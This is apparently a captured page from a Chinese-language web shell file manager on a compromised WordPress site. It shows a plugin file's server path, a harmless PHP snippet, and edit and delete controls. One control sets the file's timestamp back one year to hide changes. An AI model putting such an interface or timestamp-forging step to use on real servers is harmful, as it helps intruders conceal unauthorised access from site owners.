文件操作 - em-upgrade.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/kidsonlychiropract/public_html/wp-content/plugins/events-manager/em-upgrade.php
编辑文件内容
<?php //this will hold some stuff for updating //taken from EM_Event onstructor $event->recurrence_byday = ( empty($event['recurrence_byday']) || $event['recurrence_byday'] == 7 ) ? 0:$event['recurrence_byday']; //Backward compatibility (since 3.0.3), using 0 makes more sense due to date() function
修改文件时间
将文件时间修改为当前时间的前一年
删除文件